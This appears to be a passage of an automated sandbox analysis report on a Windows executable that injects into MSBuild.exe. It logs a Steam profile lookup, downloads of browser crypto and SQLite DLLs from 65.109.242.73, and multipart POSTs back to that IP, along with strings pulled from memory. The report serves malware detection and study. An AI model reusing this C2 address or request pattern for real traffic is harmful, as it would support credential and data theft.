                            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DHIDHIEGIIIECAKEBFBAUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Content-Length: 1529Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KFIEHIIIJDAAAAAAKECBUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJJDAEGIDHCBFHJJJEGUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HJDAKFBFBFBAAAAAEBKJUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Content-Length: 1145Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GHIJJJEGDBFHDHJJDBAKUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFCGIIEHIEGDGDGCAEBGUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAKJDHIEBFIIDGDGDBAEUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Content-Length: 453Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JDGHIIJKEBGIDHIDBKJDUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Content-Length: 100429Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KEHCAFHIJECGCAKFCGDBUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DHDHCGHDHIDHCBGCBGCAUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.73
                            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.73
                            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.73
                            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.73
                            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.73
                            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.73
                            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.73
                            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.73
                            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.73
                            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.73
                            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.73
                            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.73
                            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.73
                            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.73
                            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.73
                            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.73
                            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.73
                            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.73
                            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.73
                            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.73
                            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.73
                            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.73
                            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.73
                            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.73
                            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.73
                            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.73
                            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.73
                            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.73
                            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.73
                            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.73
                            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.73
                            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.73
                            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.73
                            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.73
                            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.73
                            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.73
                            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.73
                            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.73
                            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.73
                            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.73
                            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.73
                            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.73
                            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.73
                            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.73
                            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.73
                            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.73
                            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.73
                            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.73
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00404500 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,1_2_00404500
                            Source: global trafficHTTP traffic detected: GET /profiles/76561199673019888 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /sqln.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Cache-Control: no-cache
                            Source: unknownDNS traffic detected: queries for: steamcommunity.com
                            Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IIDHJKFBGIIJJKFIJDBGUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
                            Source: YyIDUCFWC1.exeString found in binary or memory: http://127.0.0.1:
                            Source: YyIDUCFWC1.exeString found in binary or memory: http://ACVC.WPF.Service.Wcf/IOvpnProcessRunner/IsAliveResponse
                            Source: YyIDUCFWC1.exeString found in binary or memory: http://ACVC.WPF.Service.Wcf/IOvpnProcessRunner/IsAliveT
                            Source: YyIDUCFWC1.exeString found in binary or memory: http://ACVC.WPF.Service.Wcf/IOvpnProcessRunner/StartResponse
                            Source: YyIDUCFWC1.exeString found in binary or memory: http://ACVC.WPF.Service.Wcf/IOvpnProcessRunner/StartT
                            Source: YyIDUCFWC1.exeString found in binary or memory: http://ACVC.WPF.Service.Wcf/IOvpnProcessRunner/StopResponseR
                            Source: YyIDUCFWC1.exeString found in binary or memory: http://ACVC.WPF.Service.Wcf/IOvpnProcessRunner/StopT
                            Source: YyIDUCFWC1.exeString found in binary or memory: http://ACVC.WPF.Service.WcfT
                            Source: YyIDUCFWC1.exe, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                            Source: YyIDUCFWC1.exe, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                            Source: YyIDUCFWC1.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
                            Source: YyIDUCFWC1.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
                            Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                            Source: YyIDUCFWC1.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                            Source: YyIDUCFWC1.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                            Source: YyIDUCFWC1.exe, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                            Source: YyIDUCFWC1.exe, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                            Source: YyIDUCFWC1.exeString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                            Source: YyIDUCFWC1.exe, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                            Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                            Source: YyIDUCFWC1.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                            Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                            Source: YyIDUCFWC1.exeString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                            Source: YyIDUCFWC1.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                            Source: YyIDUCFWC1.exe, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                            Source: YyIDUCFWC1.exe, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                            Source: YyIDUCFWC1.exeString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
                            Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                            Source: YyIDUCFWC1.exeString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                            Source: YyIDUCFWC1.exe, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                            Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
                            Source: YyIDUCFWC1.exeString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                            Source: YyIDUCFWC1.exeString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                            Source: YyIDUCFWC1.exeString found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
                            Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
                            Source: YyIDUCFWC1.exeString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                            Source: YyIDUCFWC1.exeString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                            Source: YyIDUCFWC1.exeString found in binary or memory: http://james.newtonking.com/projects/json
                            Source: YyIDUCFWC1.exe, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://ocsp.digicert.com0
                            Source: YyIDUCFWC1.exe, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://ocsp.digicert.com0A
                            Source: YyIDUCFWC1.exe, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://ocsp.digicert.com0C
                            Source: YyIDUCFWC1.exeString found in binary or memory: http://ocsp.digicert.com0H
                            Source: YyIDUCFWC1.exeString found in binary or memory: http://ocsp.digicert.com0I
                            Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://ocsp.digicert.com0N
                            Source: YyIDUCFWC1.exeString found in binary or memory: http://ocsp.digicert.com0O
                            Source: YyIDUCFWC1.exe, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://ocsp.digicert.com0X
                            Source: YyIDUCFWC1.exeString found in binary or memory: http://ocsp.sectigo.com0
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                            Source: YyIDUCFWC1.exe, 00000000.00000002.1701132649.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/AccessLevelDetailSet.xsd
                            Source: YyIDUCFWC1.exe, 00000000.00000002.1701132649.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/AccessLevelsSet.xsd
                            Source: YyIDUCFWC1.exe, 00000000.00000002.1701132649.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/CameraAuthenticationsSet.xsd
                            Source: YyIDUCFWC1.exe, 00000000.00000002.1701132649.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/CamerasSet.xsd
                            Source: YyIDUCFWC1.exe, 00000000.00000002.1701132649.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/CardTemplateSet.xsd
                            Source: YyIDUCFWC1.exe, 00000000.00000002.1701132649.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/CardTypesSet.xsd
                            Source: YyIDUCFWC1.exe, 00000000.00000002.1701132649.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/CardsSet.xsd
                            Source: YyIDUCFWC1.exe, 00000000.00000002.1701132649.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/DepartmentsSet.xsd
                            Source: YyIDUCFWC1.exe, 00000000.00000002.1701132649.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/DoorsSet.xsd
                            Source: YyIDUCFWC1.exe, 00000000.00000002.1701132649.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/EventsSet.xsd
                            Source: YyIDUCFWC1.exe, 00000000.00000002.1701132649.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IndividualAccessLevelsSet.xsd$SelectedTimezoneID
                            Source: YyIDUCFWC1.exe, 00000000.00000002.1701132649.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IoBoardInputsSet.xsd
                            Source: YyIDUCFWC1.exe, 00000000.00000002.1701132649.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IoBoardOutputsSet.xsd
                            Source: YyIDUCFWC1.exe, 00000000.00000002.1701132649.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IoBoardsSet.xsd
                            Source: YyIDUCFWC1.exe, 00000000.00000002.1701132649.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/OperatorSet.xsd
                            Source: YyIDUCFWC1.exe, 00000000.00000002.1701132649.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/RawEvent.xsd$StaffCategoriesSetRhttp://tempuri.org/StaffCategoriesSet.xsd
                            Source: YyIDUCFWC1.exe, 00000000.00000002.1701132649.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/TimesheetCategoriesSet.xsd
                            Source: YyIDUCFWC1.exe, 00000000.00000002.1701132649.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/TimesheetDetailsSet.xsd
                            Source: YyIDUCFWC1.exe, 00000000.00000002.1701132649.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/TimesheetEventLogsSet.xsd
                            Source: YyIDUCFWC1.exe, 00000000.00000002.1701132649.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/TimesheetSummarySet.xsd
                            Source: YyIDUCFWC1.exe, 00000000.00000002.1701132649.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/TimesheetUsersDetailSet.xsd4HolidayAdjustmentPriorYear2HolidayAdjustmentThisYear2
                            Source: YyIDUCFWC1.exe, 00000000.00000002.1701132649.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/TimezonesSet.xsd
                            Source: YyIDUCFWC1.exe, 00000000.00000002.1701132649.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/UsersSet.xsd
                            Source: YyIDUCFWC1.exe, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://www.digicert.com/CPS0
                            Source: YyIDUCFWC1.exeString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
                            Source: MSBuild.exe, MSBuild.exe, 00000001.00000002.2111715611.000000006CF6D000.00000002.00000001.01000000.0000000B.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                            Source: MSBuild.exe, 00000001.00000002.2105752036.000000001983D000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2099739476.0000000013898000.00000004.00000020.00020000.00000000.sdmp, sqln[1].dll.1.drString found in binary or memory: http://www.sqlite.org/copyright.html.
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: http://www.valvesoftware.com/legal.htm
                            Source: 76561199673019888[1].htm.1.drString found in binary or memory: https://65.109.242.73
                            Source: MSBuild.exe, 00000001.00000002.2097165559.000000000107E000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2097165559.0000000000F68000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2097165559.0000000001074000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.73/
                            Source: MSBuild.exe, 00000001.00000002.2097165559.000000000107E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.73/$
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000F68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.73/09.242.73/Local
                            Source: MSBuild.exe, 00000001.00000002.2097165559.000000000107E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.73/2
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000F68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.73/B
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.73/X
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000F68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.73/XR
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000F68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.73/amData
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.73/c
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000F68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.73/es
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000F68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.73/f
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.73/freebl3.dll
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.73/h
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.73/mozglue.dll
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.73/msvcp140.dll
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000001093000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.73/nss3.dll
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000001093000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.73/nss3.dllE
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.73/softokn3.dllX
                            Source: MSBuild.exe, 00000001.00000002.2095584347.0000000000514000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.73/sqln.dll
